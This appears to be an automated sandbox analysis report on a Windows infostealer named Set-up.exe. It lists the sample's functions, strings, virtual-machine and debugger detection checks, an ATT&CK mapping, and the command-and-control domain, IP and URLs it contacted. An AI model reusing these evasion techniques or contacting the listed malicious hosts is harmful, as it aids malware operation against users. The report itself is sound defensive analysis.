Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00B535C0	0_2_00B535C0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00B396B0	0_2_00B396B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00AA36A0	0_2_00AA36A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00B7B6F0	0_2_00B7B6F0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00B556D0	0_2_00B556D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00B69650	0_2_00B69650
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00989790	0_2_00989790
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00B917A0	0_2_00B917A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00B75780	0_2_00B75780
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_009F97D0	0_2_009F97D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00B637E0	0_2_00B637E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_008A77E0	0_2_008A77E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00B77730	0_2_00B77730
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00B4B720	0_2_00B4B720
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0087D740	0_2_0087D740
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_008B9880	0_2_008B9880
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00B6D890	0_2_00B6D890
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00B7D8E0	0_2_00B7D8E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0098F850	0_2_0098F850
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_008AB840	0_2_008AB840
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00B6B990	0_2_00B6B990
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_009DD9E0	0_2_009DD9E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00B59920	0_2_00B59920
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0096B900	0_2_0096B900
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00AC3960	0_2_00AC3960
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_009C9A10	0_2_009C9A10
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00A1FA10	0_2_00A1FA10
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00B83A70	0_2_00B83A70
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_009A9A50	0_2_009A9A50
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00B5DB80	0_2_00B5DB80
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00841BE0	0_2_00841BE0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00B71BD0	0_2_00B71BD0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00B7BB10	0_2_00B7BB10
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_008DBB50	0_2_008DBB50
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00B51B50	0_2_00B51B50
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00B4DCB0	0_2_00B4DCB0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00987CA0	0_2_00987CA0

Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 009DA170 appears 58 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 009DCBC0 appears 487 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 009DC9B0 appears 96 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 0080CAA0 appears 37 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00844F40 appears 139 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00844FD0 appears 119 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 009B7310 appears 44 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 008073F0 appears 59 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 008450A0 appears 32 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 009B7120 appears 45 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 009DE710 appears 31 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 009B7220 appears 761 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 009DCA40 appears 94 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00919720 appears 39 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00B88B80 appears 31 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 008E44A0 appears 43 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 008075A0 appears 345 times

Source: Set-up.exe

Static PE information: invalid certificate

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: Set-up.exe

Binary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd

Source: classification engine

Classification label: mal60.troj.spyw.evad.winEXE@1/0@9/2

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_0081D090 GetLastError,_errno,__sys_nerr,__sys_errlist,FormatMessageW,wcstombs,strchr,strlen,strcpy,strrchr,strrchr,_errno,GetLastError,SetLastError,_errno,_errno,GetLastError,

0_2_0081D090

Source: C:\Users\user\Desktop\Set-up.exe

0_2_0080255D

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_008029FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,

0_2_008029FF

Source: C:\Users\user\Desktop\Set-up.exe

Mutant created: \Sessions\1\BaseNamedObjects\My_mutex

Source: Set-up.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Set-up.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Set-up.exe	String found in binary or memory: set-addPolicy
Source: Set-up.exe	String found in binary or memory: in-addr.arpa
Source: Set-up.exe	String found in binary or memory: t xml:space=.gif" border="0"</body> </html> overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script> /favicon.ico" />operating system" style="width:1target="_blank">State Universitytext-align:left; document.write(, including the around t
Source: Set-up.exe	String found in binary or memory: Unable to complete request for channel-process-startup
Source: Set-up.exe	String found in binary or memory: id-cmc-addExtensions
Source: Set-up.exe	String found in binary or memory: iphlpapi.dllif_nametoindexkernel32LoadLibraryExA\/AddDllDirectorysystem_win32.c@
Source: Set-up.exe	String found in binary or memory: in-addr.arpa
Source: Set-up.exe	String found in binary or memory: 8L0123456789abcdefin-addr.arpaip6.arpa
Source: Set-up.exe	String found in binary or memory: Unable to complete request for channel-process-startup
Source: Set-up.exe	String found in binary or memory: JM[\Unable to allocate space for channel dataFailed allocating memory for channel type nameUnable to allocate temporary space for packetWould block sending channel-open requestUnable to send channel-open requestWould blockUnexpected errorUnexpected packet sizeChannel open failure (administratively prohibited)Channel open failure (connect failed)Channel open failure (unknown channel type)Channel open failure (resource shortage)Channel open failureUnable to allocate memory for setenv packetcancel-tcpip-forwardWould block sending forward requestUnable to send global-request packet for forward listen requestauth-agent-req@openssh.comauth-agent-reqcdChannel can not be reusedUnable to allocate memory for channel-process requestWould block sending channel requestUnable to send channel requestFailed waiting for channel successUnable to complete request for channel-process-startupUnexpected packet lengthUnable to allocate memory for signal nameWould block sending window adjustUnable to send transfer-window adjustment packet, deferringtransport readwould blockWe have already closed this channelEOF has already been received, data might be ignoredFailure while draining incoming flowUnable to send channel dataUnable to send EOF, but closing channel anywayWould block sending close-channelUnable to send close-channel request, but closing anywaysessionchannel.cUnable to allocate memory for direct-tcpip connectiondirect-tcpipUnable to allocate memory for direct-streamlocal connectiondirect-streamlocal@openssh.comQR0.0.0.0tcpip-forwardWould block sending global-request packet for forward listen requestUnknownUnable to allocate memory for listener queueUnable to complete request for forward-listenWould block waiting for packetChannel not foundcdenvWould block sending setenv requestUnable to send channel-request packet for setenv requestFailed getting response for channel-setenvUnable to complete request for channel-setenvcdWould block sending auth-agent requestUnable to send auth-agent requestFailed to request auth-agentUnable to complete request for auth-agentcdterm + mode lengths too largepty-reqWould block sending pty requestUnable to send pty-request packetFailed to require the PTY packageUnable to complete request for channel request-ptywindow-changeWould block sending window-change requestUnable to send window-change packetcdUnable to allocate memory for pty-requestx11-reqMIT-MAGIC-COOKIE-1Unable to get random bytes for x11-req cookie%02XWould block sending X11-req packetUnable to send x11-req packetwaiting for x11-req response packetUnable to complete request for channel x11-reqWould block sending EOFUnable to send EOF on channelReceiving channel window has been exhausted_libssh2_transport_read() bailed out!libssh2_channel_wait_closed() invoked when channel is not in EOF stateUnable to allocate memory for signal requestsignalWould block sending signal requestUnable to send signal packetecdsa-sha2-nistp256ecdsa-sha2-nistp384ecdsa-sha2-nistp521blocksize <= siz
Source: Set-up.exe	String found in binary or memory: id-cmc-addExtensions
Source: Set-up.exe	String found in binary or memory: set-addPolicy
Source: Set-up.exe	String found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>

Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: Set-up.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Set-up.exe

Static file information: File size 6759048 > 1048576

Source: Set-up.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x499800
Source: Set-up.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x151c00

Source: Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00B98D8A LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,

0_2_00B98D8A

Source: Set-up.exe

Static PE information: section name: .eh_fram

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0125CB28 push esp; retf	0_3_0125CB29
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0126E8E8 push eax; ret	0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0126E8E8 push eax; ret	0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0126E8E8 push eax; ret	0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0126E8E8 push eax; ret	0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0126E8E8 push eax; ret	0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0125CB28 push esp; retf	0_3_0125CB29
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0126E8E8 push eax; ret	0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0126E8E8 push eax; ret	0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0126E8E8 push eax; ret	0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0126E8E8 push eax; ret	0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0126E8E8 push eax; ret	0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0126E8E8 push eax; ret	0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0126E8E8 push eax; ret	0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0126E8E8 push eax; ret	0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0126E8E8 push eax; ret	0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0126E8E8 push eax; ret	0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0126E8E8 push eax; ret	0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0126E8E8 push eax; ret	0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0126E8E8 push eax; ret	0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0126E8E8 push eax; ret	0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0126E8E8 push eax; ret	0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0126E8E8 push eax; ret	0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0126E8E8 push eax; ret	0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0126E8E8 push eax; ret	0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0126E8E8 push eax; ret	0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_0126E8E8 push eax; ret	0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00B841D0 push eax; mov dword ptr [esp], edx	0_2_00B841D5
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00A20300 push eax; mov dword ptr [esp], 00000000h	0_2_00A20305
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0087C6D0 push eax; mov dword ptr [esp], edx	0_2_0087C6D5
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_008A8640 push eax; mov dword ptr [esp], edx	0_2_008A8645

Malware Analysis System Evasion

Contain functionality to detect virtual machines

Source: C:\Users\user\Desktop\Set-up.exe

Code function: C:\Windows\System32\VBox*.dll vbox_first SYSTEM\ControlSet001\Services\VBoxSF vbox_second

0_2_008029FF

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Set-up.exe	Binary or memory string: PROCMON.EXE
Source: Set-up.exe	Binary or memory string: X64DBG.EXE
Source: Set-up.exe	Binary or memory string: WINDBG.EXE
Source: Set-up.exe	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: Set-up.exe	Binary or memory string: WIRESHARK.EXE

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_009E9980 rdtsc

0_2_009E9980

Source: C:\Users\user\Desktop\Set-up.exe

0_2_008029FF

Source: C:\Users\user\Desktop\Set-up.exe

API coverage: 7.4 %

Source: C:\Users\user\Desktop\Set-up.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0080255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,	0_2_0080255D
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_008029FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,	0_2_008029FF
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_009DE270 _errno,FindNextFileW,WideCharToMultiByte,strlen,_errno,calloc,MultiByteToWideChar,MultiByteToWideChar,_errno,GetLastError,MultiByteToWideChar,wcscpy,FindFirstFileW,free,_errno,	0_2_009DE270

Source: C:\Users\user\Desktop\Set-up.exe

0_2_0080255D

Source: C:\Users\user\Desktop\Set-up.exe

0_2_0080255D

Source: Set-up.exe	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Set-up.exe, 00000000.00000003.1679111250.0000000001027000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
Source: Set-up.exe	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Set-up.exe, 00000000.00000002.1771730031.000000000344E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1769862213.00000000033D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2 },

Source: C:\Users\user\Desktop\Set-up.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_009E9980 rdtsc

0_2_009E9980

Source: C:\Users\user\Desktop\Set-up.exe

0_2_008029FF

Source: C:\Users\user\Desktop\Set-up.exe

0_2_00B98D8A

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0080116C Sleep,Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,_cexit,_initterm,exit,	0_2_0080116C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_008011A3 Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,	0_2_008011A3
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00801160 Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,	0_2_00801160
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_008013C9 SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,_initterm,	0_2_008013C9

Source: C:\Users\user\Desktop\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_009E93D0 GetSystemTime,SystemTimeToFileTime,

0_2_009E93D0

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00C90730 GetVersion,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,GetLastError,__acrt_iob_func,_time32,GetLastError,__acrt_iob_func,

0_2_00C90730

Source: C:\Users\user\Desktop\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Set-up.exe, Set-up.exe, 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: procmon.exe
Source: Set-up.exe, Set-up.exe, 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Infostealer behavior detected

Source: Signature Results

Signatures: Mutex created, HTTP post and idle behavior

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.4:49731 -> 194.87.58.155:80

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0083A550 setsockopt,_errno,_errno,_errno,_errno,setsockopt,WSAGetLastError,getsockopt,setsockopt,strlen,htons,getsockopt,setsockopt,WSAGetLastError,WSAGetLastError,strchr,htons,bind,WSAGetLastError,htons,bind,WSAGetLastError,htons,strtoul,	0_2_0083A550
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_008CAA30 htons,htons,socket,ioctlsocket,setsockopt,setsockopt,htonl,bind,setsockopt,setsockopt,connect,WSAGetLastError,closesocket,	0_2_008CAA30
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0084E480 strlen,strchr,strchr,strchr,strtoul,strchr,strtoul,memcpy,getsockname,WSAGetLastError,WSAGetLastError,memcpy,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,bind,htons,bind,WSAGetLastError,getsockname,listen,listen,WSAGetLastError,htons,	0_2_0084E480

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Deobfuscate/Decode Files or Information	LSASS Memory	231 Security Software Discovery	Remote Desktop Protocol	1 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	12 Process Discovery	Distributed Component Object Model	Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	17 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
http://home.eleventh11vs.top/MTL	0%	Avira URL Cloud	safe
http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuXW1735556847http://home.eleventh11vs.top/MTL	0%	Avira URL Cloud	safe
http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuXW1735556847963	0%	Avira URL Cloud	safe
http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuXW1735556847	0%	Avira URL Cloud	safe
http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuX847	0%	Avira URL Cloud	safe
http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuXW1735556847fd4	0%	Avira URL Cloud	safe
http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuXW1735556847?argument=0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
home.eleventh11vs.top	194.87.58.155	true	true		unknown
httpbin.org	34.197.122.172	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuXW1735556847	true	Avira URL Cloud: safe	unknown
http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuXW1735556847?argument=0	true	Avira URL Cloud: safe	unknown
https://httpbin.org/ip	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://curl.se/docs/hsts.html	Set-up.exe	false		high
http://html4/loose.dtd	Set-up.exe	false		high
https://curl.se/docs/alt-svc.html#	Set-up.exe	false		high
https://httpbin.org/ipbefore	Set-up.exe	false		high
